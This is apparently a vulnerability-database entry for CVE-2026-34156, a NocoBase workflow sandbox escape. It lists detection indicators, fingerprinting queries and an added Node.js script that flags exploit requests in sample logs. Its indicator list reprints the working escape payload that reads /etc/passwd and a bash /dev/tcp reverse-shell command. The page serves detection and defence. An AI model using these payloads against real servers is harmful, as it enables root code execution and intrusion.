cbcvebase.
CVE-2026-34156
published 2026-03-31

CVE-2026-34156: NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.28, NocoBase's Workflow…

Priority: P1 (84) · Severity: critical · CVSS 3.1 base score: 9.9
Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Exploit: available
EPSS: 36.50% (98.3th percentile)
NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.28, NocoBase's Workflow Script Node executes user-supplied JavaScript inside a Node.js vm sandbox with a custom require allowlist (controlled by WORKFLOW_SCRIPT_MODULES env var). However, the console object passed into the sandbox context exposes host-realm WritableWorkerStdio stream objects via console._stdout and console._stderr. An authenticated attacker can traverse the prototype chain to escape the sandbox and achieve Remote Code Execution as root. This issue has been patched in version 2.0.28.

Affected (2 ranges)

| Vendor   | Product                    | Version range   | Fixed in |
|----------|----------------------------|-----------------|----------|
| nocobase | nocobase                   | < 2.0.28        | 2.0.28   |
| nocobase | plugin-workflow-javascript | >= 0, < 2.0.28  | 2.0.28   |

Detection & IOCs (extracted from sources)

• url: /api/auth:signIn
• url: /api/flow_nodes:test
• command: const Fn=console._stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('child_process');
• command: const Fn=console._stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('child_process');return cp.execSync('cat /etc/passwd').toString().trim();
• other: WritableWorkerStdio
• other: console._stdout
• other: console._stderr
• command: bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
sigma:
id: CVE-2026-34156
info:
  name: NocoBase - VM Sandbox Escape to Remote Code Execution
  author: theamanrawat
  severity: critical

Notes extracted from the source:
• Detect exploitation attempts by monitoring POST requests to /api/flow_nodes:test containing the sandbox escape chain string 'console._stdout.constructor.constructor' in the request body.
• Fingerprint vulnerable NocoBase instances using Shodan query 'http.title:"NocoBase"' or FOFA query 'body="__nocobase_public_path__"'.
• Vulnerability check phase looks for 'WritableWorkerStdio' as the stream constructor name and 'function' as the fnConstructor type in the sandbox response — a positive match confirms the target is vulnerable.
• The exploit authenticates via POST /api/auth:signIn with JSON body {"account":"<user>","password":"<pass>"} and then uses the returned Bearer token to call /api/flow_nodes:test — correlate these two sequential API calls from the same source IP as a strong exploitation indicator.
• The Nuclei template confirms exploitation by matching 'root:.*:0:0:' regex in the HTTP response body from /api/flow_nodes:test, indicating successful /etc/passwd read via RCE.
• The exploit payload uses the prototype chain traversal pattern: console._stdout.constructor.constructor → Function → process → mainModule.require('child_process'). Alert on this string pattern in any HTTP POST body.
• The sandbox escape is only possible when the host console object is passed into the Node.js vm sandbox context. The attack surface is controlled by the WORKFLOW_SCRIPT_MODULES environment variable (custom require allowlist), but the console object exposure is the root cause regardless of allowlist configuration.
• Exploitation requires valid credentials for any user with workflow access — it is not an unauthenticated vulnerability. The /api/flow_nodes:test endpoint should be restricted to admin-only roles as a compensating control.
• The reverse shell payload uses bash /dev/tcp and is specific to Debian-based container environments. Other OS/shell environments may require a different reverse shell payload.
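As an added example (not code from the advisory, NocoBase, or the Nuclei template), the Node.js script below applies the two indicators above to constructed request records: it flags POST bodies to /api/flow_nodes:test that carry the console._stdout/_stderr constructor chain and correlates them with a preceding /api/auth:signIn from the same source IP. The pattern is broadened to bracket-notation and whitespace spellings of the same chain, and the 10-minute correlation window is an assumption, not a value from the page.

```javascript
// Added detection example: not code from the advisory, NocoBase, or the Nuclei template.
// Records are a constructed stand-in for an access log that retains POST bodies.
const SIGNIN_PATH = '/api/auth:signIn';
const TEST_PATH = '/api/flow_nodes:test';
const WINDOW_MS = 10 * 60 * 1000; // assumed: signIn within 10 min counts as correlated
// Property access written as .name, ["name"] or ['name'], allowing JSON-escaped quotes.
const PROP = (name) => `(?:\\.\\s*${name}|\\[\\s*\\\\?['"]${name}\\\\?['"]\\s*\\])`;
// The chain from the advisory, broadened to bracket/whitespace spellings (an assumption).
const ESCAPE_CHAIN = new RegExp(
  `console\\s*${PROP('_std(?:out|err)')}\\s*${PROP('constructor')}\\s*${PROP('constructor')}`
);
// Classify one request; lastSignIn maps source IP -> timestamp of its latest signIn.
function classify(record, lastSignIn) {
  if (record.method !== 'POST') return null;
  if (record.path === SIGNIN_PATH) {
    lastSignIn.set(record.ip, record.ts);
    return null;
  }
  if (record.path !== TEST_PATH) return null;
  const chain = ESCAPE_CHAIN.test(record.body || '');
  const prev = lastSignIn.get(record.ip);
  const correlated = prev !== undefined && record.ts >= prev && record.ts - prev <= WINDOW_MS;
  if (!chain && !correlated) return null;
  // The chain string is the real signal; login then a test call is also normal workflow use.
  const severity = chain ? (correlated ? 'critical' : 'high') : 'low';
  return { ip: record.ip, ts: record.ts, escapeChain: chain, signInCorrelated: correlated, severity };
}
// Walk records in time order and collect alerts.
function analyze(records) {
  const lastSignIn = new Map();
  const alerts = [];
  for (const r of [...records].sort((a, b) => a.ts - b.ts)) {
    const alert = classify(r, lastSignIn);
    if (alert) alerts.push(alert);
  }
  return alerts;
}
// Constructed sample traffic (RFC 5737 documentation addresses).
const SAMPLE = [
  { ts: 1000, ip: '203.0.113.7', method: 'POST', path: SIGNIN_PATH, body: '{"account":"u","password":"p"}' },
  { ts: 2000, ip: '192.0.2.50', method: 'POST', path: SIGNIN_PATH, body: '{"account":"v","password":"q"}' },
  { ts: 2500, ip: '192.0.2.50', method: 'POST', path: TEST_PATH, body: '{"script":"return 42;"}' },
  { ts: 4000, ip: '203.0.113.7', method: 'POST', path: TEST_PATH,
    body: '{"script":"const Fn=console._stdout.constructor.constructor;"}' },
  { ts: 5000, ip: '198.51.100.4', method: 'POST', path: TEST_PATH, body: '{"script":"return 1+1;"}' },
  { ts: 6000, ip: '192.0.2.9', method: 'POST', path: TEST_PATH,
    body: '{"script":"console[\\"_stderr\\"][\\"constructor\\"].constructor"}' },
];
console.log(analyze(SAMPLE));
```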